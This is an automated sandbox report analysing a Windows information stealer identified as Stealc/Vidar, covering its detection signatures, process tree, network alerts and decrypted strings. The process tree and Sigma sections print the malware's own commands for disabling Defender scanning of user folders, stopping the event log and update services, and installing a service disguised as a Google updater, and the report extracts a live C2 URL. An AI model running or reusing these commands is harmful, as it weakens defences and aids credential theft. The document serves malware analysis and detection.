Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WGo3ga1AL9.exe

Overview

General Information

Sample name:WGo3ga1AL9.exe
renamed because original name is a hash value
Original sample name:61b72b2d4099b7ca2af5318b4ea6a668.exe
Analysis ID:1546262
MD5:61b72b2d4099b7ca2af5318b4ea6a668
SHA1:7c38e00060124176ae1b5ad7f17dd8a202445f26
SHA256:b3b766fc82f285fbdfdfd1246fa7a227e7e8d4228a0a13c6187c4aab2149d0be
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the hosts file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WGo3ga1AL9.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\WGo3ga1AL9.exe" MD5: 61B72B2D4099B7CA2AF5318B4EA6A668)
    • chrome.exe (PID: 7412 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 --field-trial-handle=2444,i,1816216943429670437,7438663567690844307,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • cmd.exe (PID: 352 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDBFCGIIIJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • GDBFCGIIIJ.exe (PID: 6016 cmdline: "C:\ProgramData\GDBFCGIIIJ.exe" MD5: D9A5E741B1F67593422BFB1A165288BB)
        • powershell.exe (PID: 5796 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 8100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 7852 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 8164 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7820 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7792 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2828 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7552 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7640 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7676 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7620 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7696 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 8064 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5868 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3264 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6024 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 8000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 2296 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7972 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • updater.exe (PID: 5968 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: D9A5E741B1F67593422BFB1A165288BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}

Threatname: Vidar

{"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2313485622.00000000007D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 6 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.3.WGo3ga1AL9.exe.2500000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.WGo3ga1AL9.exe.2500000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.WGo3ga1AL9.exe.2420e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.WGo3ga1AL9.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    Change of critical system settings

                    barindex
                    Sigma detected: Disable power options
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7640, ProcessName: powercfg.exe

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5796, ProcessName: powershell.exe
                    Sigma detected: Browser Started with Remote Debugging
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\WGo3ga1AL9.exe", ParentImage: C:\Users\user\Desktop\WGo3ga1AL9.exe, ParentProcessId: 7308, ParentProcessName: WGo3ga1AL9.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7412, ProcessName: chrome.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5796, ProcessName: powershell.exe
                    Sigma detected: New Service Creation Using Sc.EXE
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 5868, ProcessName: sc.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5796, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7524, ProcessName: svchost.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Stop EventLog
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\GDBFCGIIIJ.exe" , ParentImage: C:\ProgramData\GDBFCGIIIJ.exe, ParentProcessId: 6016, ParentProcessName: GDBFCGIIIJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3264, ProcessName: sc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:18.847820+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449755TCP
                    2024-10-31T17:12:57.211015+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449765TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:03.087845+010020442451Malware Command and Control Activity Detected185.235.128.1680192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:02.950019+010020442441Malware Command and Control Activity Detected192.168.2.449730185.235.128.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:03.319547+010020442461Malware Command and Control Activity Detected192.168.2.449730185.235.128.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:29.198322+010020442491Malware Command and Control Activity Detected192.168.2.449754185.235.128.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:03.974595+010020442481Malware Command and Control Activity Detected192.168.2.449730185.235.128.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:03.327071+010020442471Malware Command and Control Activity Detected185.235.128.1680192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:02.707778+010020442431Malware Command and Control Activity Detected192.168.2.449730185.235.128.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T17:12:04.497760+010028033043Unknown Traffic192.168.2.449730185.235.128.1680TCP
                    2024-10-31T17:12:19.028451+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:21.221320+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:22.447065+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:23.327104+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:26.250802+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:26.891766+010028033043Unknown Traffic192.168.2.449754185.235.128.1680TCP
                    2024-10-31T17:12:32.171102+010028033043Unknown Traffic192.168.2.44976187.106.236.48443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: WGo3ga1AL9.exeAvira: detected
                    Found malware configuration
                    Source: 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}
                    Source: 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}
                    Multi AV Scanner detection for submitted file
                    Source: WGo3ga1AL9.exeReversingLabs: Detection: 39%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: WGo3ga1AL9.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: INSERT_KEY_HERE
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 22
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 11
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 20
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 24
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetProcAddress
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: LoadLibraryA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: lstrcatA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: OpenEventA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateEventA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CloseHandle
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Sleep
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetUserDefaultLangID
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: VirtualAllocExNuma
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: VirtualFree
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetSystemInfo
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: VirtualAlloc
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HeapAlloc
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetComputerNameA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: lstrcpyA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetProcessHeap
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetCurrentProcess
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: lstrlenA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ExitProcess
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GlobalMemoryStatusEx
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetSystemTime
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SystemTimeToFileTime
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: advapi32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: gdi32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: user32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: crypt32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ntdll.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetUserNameA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateDCA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetDeviceCaps
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ReleaseDC
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CryptStringToBinaryA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sscanf
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: VMwareVMware
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HAL9TH
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: JohnDoe
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DISPLAY
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %hu/%hu/%hu
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: http://185.235.128.16
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: gjtwvm
